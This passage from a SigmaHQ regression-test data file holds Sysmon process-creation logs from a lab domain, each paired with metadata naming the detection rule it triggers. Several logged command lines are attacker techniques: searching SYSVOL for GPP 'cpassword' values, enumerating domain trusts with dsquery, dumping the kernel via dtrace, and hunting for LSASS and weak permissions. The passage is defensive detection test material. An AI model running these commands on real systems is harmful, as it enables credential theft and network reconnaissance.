\"5AA13A44-D534-68FC-FF30-000000004002\",\n      \"ProcessId\": 168,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\dsquery.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Microsoft AD DS/LDS query command line utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"dsquery.exe\",\n      \"CommandLine\": \"dsquery  * -filter \\\"(objectClass=trustedDomain)\\\" -attr *\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml",
    "content": "id: 91c77c64-7f4f-4bba-be6a-42377c97b48a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3bad990e-4848-4a78-9530-b427d854aac0\n      title: Domain Trust Discovery Via Dsquery\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:04:12.105550Z\"\n        }\n      },\n      \"EventRecordID\": 33630917,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:04:12.104\",\n      \"ProcessGuid\": \"5AA13A44-B6FC-68FE-0802-000000004102\",\n      \"ProcessId\": 2524,\n      \"Image\": \"C:\\\\Program Files\\\\DTrace\\\\dtrace.exe\",\n      \"FileVersion\": \"10.0.22621.1 (WinBuild.160101.0800)\",\n      \"Description\": \"DTrace/NT\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"dtrace.exe\",\n      \"CommandLine\": \"dtrace.exe  -w \\\"syscall:::return {lkd(0); exit(0);}\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:04:13.045253Z\"\n        }\n      },\n      \"EventRecordID\": 33630948,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:04:13.044\",\n      \"ProcessGuid\": \"5AA13A44-B6FD-68FE-0902-000000004102\",\n      \"ProcessId\": 7748,\n      \"Image\": \"C:\\\\Program Files\\\\DTrace\\\\dtrace.exe\",\n      \"FileVersion\": \"10.0.22621.1 (WinBuild.160101.0800)\",\n      \"Description\": \"DTrace/NT\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"dtrace.exe\",\n      \"CommandLine\": \"dtrace.exe  -w -n \\\"syscall:::return {lkd(0); exit(0);}\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml",
    "content": "id: c81d2cc0-3296-47fd-b57d-334b3a17ab02\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795\n      title: Suspicious Kernel Dump Using Dtrace\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:08:16.515256Z\"\n        }\n      },\n      \"EventRecordID\": 33635575,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:08:16.514\",\n      \"ProcessGuid\": \"5AA13A44-B7F0-68FE-2902-000000004102\",\n      \"ProcessId\": 9040,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"FileVersion\": \"10.0.20348.3692 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Explorer\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"EXPLORER.EXE\",\n      \"CommandLine\": \"explorer  shell:MyComputerFolder\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=8BAA602FDC6BA67545C0717E2B9063A0BFE3F278,MD5=1FB8907465FB58429762D97C1FBEA04A,SHA256=53F36699C35C8F2360608A79F0809BA888C61F15886AE2B1F209A3E9B896CBA7,IMPHASH=BECD30EE79098B21A5BA5E5CF0E18B83\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml",
    "content": "id: ddbc40a4-117f-4359-9a22-f943dd25535f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c3d76afc-93df-461e-8e67-9b2bad3f2ac4\n      title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:50:13.199218Z\"\n        }\n      },\n      \"EventRecordID\": 9105822,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:50:13.191\",\n      \"ProcessGuid\": \"5AA13A44-D595-68FC-0A31-000000004002\",\n      \"ProcessId\": 7772,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  /S cpassword \\\\\\\\AR-WIN-DC\\\\sysvol\\\\*.xml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml",
    "content": "id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 91a2c315-9ee6-4052-a853-6f6a8238f90d\n      title: Findstr GPP Passwords\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:41:46.744119Z\"\n        }\n      },\n      \"EventRecordID\": 12151329,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:41:46.742\",\n      \"ProcessGuid\": \"5AA13A44-0BDA-68FD-7836-000000004002\",\n      \"ProcessId\": 8892,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  lsass\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/info.yml",
    "content": "id: 241a8371-1554-4cfc-8a51-c671669f4a71\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fe63010f-8823-4864-a96b-a7b4a0f7b929\n      title: LSASS Process Reconnaissance Via Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:01.671694Z\"\n        }\n      },\n      \"EventRecordID\": 12249325,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:01.664\",\n      \"ProcessGuid\": \"5AA13A44-0D15-68FD-B436-000000004002\",\n      \"ProcessId\": 2764,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\icacls.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"-\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"iCACLS.EXE\",\n      \"CommandLine\": \"icacls  \\\"C:\\\\Program Files\\\\*\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=0EB3DC9113AE28D77A85A52B3BF7B79A4B7FD24E,MD5=4B8207877186FAFFB90E3A4D9358CBA6,SHA256=054355C415F5686DA598011065E6FDF6BED35C5FDDA81BC5BF22B9D093CC30E2,IMPHASH=446163A548337B5BCF2727BCD1CFB399\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:01.679477Z\"\n        }\n      },\n      \"EventRecordID\": 12249342,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:01.673\",\n      \"ProcessGuid\": \"5AA13A44-0D15-68FD-B536-000000004002\",\n      \"ProcessId\": 9016,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  \\\"(M)\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:01.687849Z\"\n        }\n      },\n      \"EventRecordID\": 12249358,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:01.681\",\n      \"ProcessGuid\": \"5AA13A44-0D15-68FD-B636-000000004002\",\n      \"ProcessId\": 3356,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  \\\"Everyone\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml",
    "content": "id: bfab9c3b-5f4b-496c-aa6a-8870fec99738\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 47e4bab7-c626-47dc-967b-255608c9a920\n      title: Permission Misconfiguration Reconnaissance Via Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:51:29.178909Z\"\n        }\n      },\n      \"EventRecordID\": 9129415,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:51:29.168\",\n      \"ProcessGuid\": \"5AA13A44-D5E1-68FC-1131-000000004002\",\n      \"ProcessId\": 3384,\n      \"Image\": 